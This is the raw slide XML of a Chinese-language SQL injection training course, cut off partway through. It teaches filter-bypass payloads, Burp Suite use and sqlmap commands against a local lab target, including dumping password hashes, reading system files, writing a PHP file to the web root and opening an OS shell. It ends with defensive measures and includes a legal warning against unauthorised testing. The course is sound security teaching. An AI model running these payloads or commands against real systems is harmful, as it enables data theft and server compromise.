            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>替换成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>oorr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，可成功运行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48305"/>
            <a:ext cx="7473315" cy="1735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" y="4765675"/>
            <a:ext cx="4975225" cy="2030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55" y="4737735"/>
            <a:ext cx="5769610" cy="205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0036" y="72797"/>
            <a:ext cx="1005939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温馨提示：请勿进行非授权渗透测试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440" y="1154430"/>
            <a:ext cx="6505575" cy="4488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1330" y="5665470"/>
            <a:ext cx="294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中华人民共和国刑法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44970" y="1154430"/>
            <a:ext cx="5268595" cy="1501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45605" y="2747010"/>
            <a:ext cx="5267960" cy="289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27670" y="5665470"/>
            <a:ext cx="294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中华人民共和国网络安全法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6680" y="6330315"/>
            <a:ext cx="1192149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对在线系统渗透测试需要在授权前提下进行；所有未经授权渗透测试，无论善意恶意，均属于违法</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN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进阶利用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 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>空格过滤绕过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357610" cy="19919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对空格进行过滤，导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>执行报错</a:t>
            </a:r>
          </a:p>
          <a:p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d=1'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or 1=1 or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>='过滤后变成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d=1'or1=1or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='</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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语句中制表符、新行、新页、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>return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/**/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等都可以代替空格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将参数改成id=1'/**/or/**/1=1/**/or/**/1='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90" y="3749675"/>
            <a:ext cx="5038725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" y="3749675"/>
            <a:ext cx="54387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进阶利用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 - union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过滤绕过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union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进行过滤，导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>执行报错</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>id=1' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0,User,Password FROM mysql.user) ORDER BY id; -- 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>过滤后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>id=1' ( 0,User,Password FROM mysql.user) ORDER BY id; -- 1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union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大小写混写，或双写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65" y="4911090"/>
            <a:ext cx="5763895" cy="1669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240" y="3385820"/>
            <a:ext cx="7953375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" y="4911090"/>
            <a:ext cx="5798185" cy="16446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165" y="2308860"/>
            <a:ext cx="5295265" cy="1461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9600"/>
              <a:t>答疑时间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工具使用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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是用于攻击web应用程序的集成平台。包含了许多工具，并为这些工具设计了许多接口，以促进加快攻击应用程序的过程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226310"/>
            <a:ext cx="7745095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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在本次课程中，主要用到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Porxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Repeater</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>两个模块、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Porxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模块</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>拦截HTTP/S的代理服务器，作为一个在浏览器和目标应用程序之间的中间人，允许你拦截，查看，修改在两个方向上的原始数据流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0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Repeater</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模块</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一个靠手动操作来触发单独的HTTP 请求，并分析应用程序响应的工具；通过该模块可以快速修改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头、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请求内容、对参数进行编码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运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>后，先将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Intercept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>off</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，再将浏览器的代理设置成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>127.0.0.1:8080</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，流量就可以经过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>burpsuite</a:t>
            </a:r>
          </a:p>
          <a:p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294890"/>
            <a:ext cx="6713220" cy="4563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26069"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="387985" y="2967355"/>
            <a:ext cx="4495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在浏览器访问靶机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>;burpsuite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proxy=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>》</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>即可看到该访问记录，包含详细的请求和响应信息，选择一条记录，按快捷键</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Ctrl+R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>发送到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Repeater</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>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3181985"/>
            <a:ext cx="4568190" cy="2329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05" y="2280920"/>
            <a:ext cx="5996305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切换到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Repeater</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模块，修改请求内容后，点击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，即可发起请求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55" y="2252980"/>
            <a:ext cx="88296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手动渗透工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - burpsuite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381760"/>
            <a:ext cx="11114405" cy="4867910"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>编码解码模块，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>playload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进行编码解码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233930"/>
            <a:ext cx="100774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0036" y="72797"/>
            <a:ext cx="1005939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279400" y="972820"/>
          <a:ext cx="11772900" cy="574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36895" y="50165"/>
            <a:ext cx="647319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注：上午理论课程中会适当穿插演示内容；</a:t>
            </a:r>
          </a:p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每章节会预留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5~10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分钟答疑时间，如有疑问可集中提问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自动渗透工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - sqlmap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dirty="0"/>
              <a:t>sqlmap 是一个开源渗透测试工具，可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。 它配备了强大的检测引擎，为渗透测试人员提供了许多称心功能，以及从数据库指纹识别、从数据库获取数据、访问底层文件系统和在操作系统上执行命令。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45" y="3071495"/>
            <a:ext cx="590994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自动渗透工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - sqlmap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18490" y="1381760"/>
          <a:ext cx="11082020" cy="489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判断是否存在注入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 -u http://127.0.0.1/sqli-labs/Less-1/?id=1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读取日志的请求进行检测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 -l request.txt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查询当前的所有数据库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http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbs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获取数据库下的表名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http://127.0.0.1/sqli-labs/Less-1/?id=1 -D security --tables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获取表中的字段名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http://127.0.0.1/sqli-labs/Less-1/?id=1 -D security -T users --columns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获取字段的内容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http://127.0.0.1/sqli-labs/Less-1/?id=1 -D security -T users -C username,password --dump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获取数据库的所有用户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http://127.0.0.1/sqli-labs/Less-1/?id=1 --users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获取数据库用户的密码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http://127.0.0.1/sqli-labs/Less-1/?id=1 --password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获取当前数据库的名称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http://127.0.0.1/sqli-labs/Less-1/?id=1 --current-db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获取当前数据库的用户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sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --current-user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自动渗透工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - sqlmap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18490" y="1381760"/>
          <a:ext cx="1108202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--level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探测等级：1-5，默认为1，等级越高，payload越多，速度越慢。HTTP cookei在level为2时就会测试，HTTP User-Agent/Referer在level为3时就会测试。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--risk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危险登录：1-3，默认为1，等级越高，越可能对数据库造成破坏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--id-dba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当前用户是否为管理权限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--sql-shell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运行自定义sql语句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--os-cmd,--os-shell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运行任意操作系统命令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--file-read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从数据库服务器中读取文件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--file-write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上传文件到数据库服务器中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--flush-session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清空已保存的会话信息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检测是否存在注入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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>sqlmap -u http://192.168.75.141/sqli-labs/Less-1/?id=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>检测出该链接的参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存在联合查询注入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2359660"/>
            <a:ext cx="11082655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指定注入点、DBMS进行检测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sz="2000" dirty="0"/>
              <a:t>sqlmap -u http://192.168.75.141/sqli-labs/Less-1/?id=1 -p id --dbms mysql</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有时候已知存在问题的参数、后端的数据库类型，可直接通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--dbms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参数进行指定，减少检测时间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3290570"/>
            <a:ext cx="11617325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从日志文件发起检测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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果请求需要包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>头、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内容，通过日志发起检测是一种比较便捷的方式；从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>历史记录中复制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所有的内容，保存到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>request.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件，使用命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>sqlmap -l request.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发起请求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3159125"/>
            <a:ext cx="4880610" cy="3293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2837180"/>
            <a:ext cx="6540500" cy="380555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750" y="365125"/>
            <a:ext cx="10398760" cy="828040"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sqlmap - 获取数据库名、数据库表、数据库字段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362927" cy="4868138"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>sqlmap -u http://192.168.75.141/sqli-labs/Less-1/?id=1 --current-db</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> -u http://192.168.75.141/sqli-labs/Less-1/?id=1 -D security --tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> -u http://192.168.75.141/sqli-labs/Less-1/?id=1 -D security -T users --columns</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="zh-CN" sz="20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87" y="3630072"/>
            <a:ext cx="4143375" cy="2181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149" y="3630073"/>
            <a:ext cx="3838575" cy="218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86" y="3630072"/>
            <a:ext cx="3296199" cy="21812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获取数据库中的数据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获取指定表中的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> -u http://192.168.75.141/sqli-labs/Less-1/?id=1 -D security -T users --dump</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>获取所有表的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> -u http://192.168.75.141/sqli-labs/Less-1/?id=1 --dump-all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9" y="2546647"/>
            <a:ext cx="7261123" cy="421089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运行自定义sql语句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sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> -u http://192.168.75.141/sqli-labs/Less-1/?id=1 --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-shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>然后在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中输入自定义的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8" y="2286235"/>
            <a:ext cx="9773006" cy="439942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获取数据库所有用户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nl-NL" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>sqlmap -u http://192.168.75.141/sqli-labs/Less-1/?id=1 --users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26" y="2020813"/>
            <a:ext cx="8429709" cy="3345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实操所需工具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340" y="1252855"/>
            <a:ext cx="10052050" cy="5172710"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="87500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>VMware Workstations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>集成渗透测试环境（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>kali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/>
              <a:t>https://kali.download/virtual-images/kali-2022.2/kali-linux-2022.2-vmware-amd64.7z</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>靶机环境：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>传输链接：https://cowtransfer.com/s/128ec262553640</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>传输口令：9qqxac</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>集成环境</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>https://jaist.dl.sourceforge.net/project/xampp/XAMPP%20Windows/5.6.40/xampp-windows-x64-5.6.40-1-VC11-installer.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Burpsuite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://portswigger.net/burp/releases/professional-community-2022-8-1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-labs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://github.com/Audi-1/sqli-labs/archive/refs/heads/master.zip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4880" y="6210935"/>
            <a:ext cx="647954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注意：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上午先下载好以上环境，以免影响下午实操进度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获取并破解数据库密码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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>sqlmap -u http://192.168.75.141/sqli-labs/Less-1/?id=1 --passwords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73" y="2585239"/>
            <a:ext cx="11177195" cy="246114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读取系统文件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es-ES" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>sqlmap -u http://192.168.75.141/sqli-labs/Less-1/?id=1 --file-read=/etc/os-release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45" y="1922803"/>
            <a:ext cx="7900570" cy="439155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写入系统文件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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> -u http://192.168.75.141/sqli-labs/Less-1/?id=1 --file-write=/root/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>test.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> --file-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=/var/www/html/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>test.php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2" y="2345265"/>
            <a:ext cx="6013230" cy="390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09" y="2345265"/>
            <a:ext cx="5751224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- 执行系统命令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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>sqlmap -u http://192.168.75.141/sqli-labs/Less-1/?id=1 --os-shell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7" y="1817923"/>
            <a:ext cx="8530927" cy="478743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165" y="2308860"/>
            <a:ext cx="5295265" cy="1461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9600"/>
              <a:t>答疑时间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防护方法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04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设备防护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1070029" y="1120084"/>
            <a:ext cx="1005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通过专业的安全设备进行防护（例如下一代防火墙、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>），更新相应的防护规则。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4" y="2409606"/>
            <a:ext cx="7102091" cy="43513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636" y="2409607"/>
            <a:ext cx="2890067" cy="435133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46219" y="2014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语义引擎防护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32839" y="2014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规则引擎防护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编码规范 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关键字过滤（黑名单过滤）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1070029" y="1120084"/>
            <a:ext cx="1005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关键字过滤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11" y="1839862"/>
            <a:ext cx="9154160" cy="389805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编码规范 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参数校验（白名单校验）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1069975" y="1120140"/>
            <a:ext cx="10052050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8B92E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检查传入参数是否符合预期的格式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数字型：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>检查传入参数是否为数字；如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中采用is_numeric()判断是否数字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字符型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>采用正则表达式校验是否符合预期格式；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>日期：^\d{4}-\d{1,2}-\d{1,2}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
          </a:p>
          <a:p>
